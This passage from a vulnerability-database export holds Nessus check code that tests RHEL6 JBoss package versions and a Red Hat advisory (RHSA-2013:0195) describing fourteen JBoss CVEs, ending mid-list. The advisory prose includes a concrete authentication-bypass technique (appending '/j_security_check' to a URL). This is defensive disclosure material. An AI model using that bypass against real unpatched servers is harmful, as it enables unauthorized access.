(rpm_check(release:\"RHEL6\", reference:\"javassist-3.12.0-6.SP1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cache-pojo-3.0.1-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cl-2.0.11-4.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-common-beans-1.0.1-2.Final.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-common-core-2.2.21-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-interceptors-1.0.9-0.2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-0.1.1-0.8.ep5.el6\")) 
flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb3-transactions-1.0.2-1.6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-messaging-1.4.8-12.SP9.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-reflect-2.0.4-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-docs-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-seam2-examples-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", 
reference:\"jboss-seam2-runtime-2.2.6.EAP5-14.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jboss-vfs2-2.2.1-4.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-client-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-hornetq-5.2.0-7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-messaging-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-tp-licenses-5.2.0-8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-cxf-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossas-ws-native-5.2.0-16.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossts-4.6.1-12.CP13.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossts-javadoc-4.6.1-12.CP13.7.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el6\")) flag++;\nif 
(rpm_check(release:\"RHEL6\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jgroups-2.6.22-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-as-5-plugin-3.0.0-16.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"netty-3.2.5-6.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.1.5-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", 
reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-examples-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-javadoc-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"resteasy-manual-1.2.1-17.CP02_patch02.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rh-eap-docs-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rh-eap-docs-examples-5.2.0-10.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif 
(rpm_check(release:\"RHEL6\", reference:\"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el6\")) flag++;\nif 
(rpm_check(release:\"RHEL6\", reference:\"wss4j-1.5.12-4_patch_02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.1-2.ep5.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:02", "description": "Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. 
(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. 
If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EWP (RHSA-2013:0195)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", 
"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hsqldb", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", 
"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", 
"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common", "p-cpe:/a:redhat:enterprise_linux:rhq-helpers", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", 
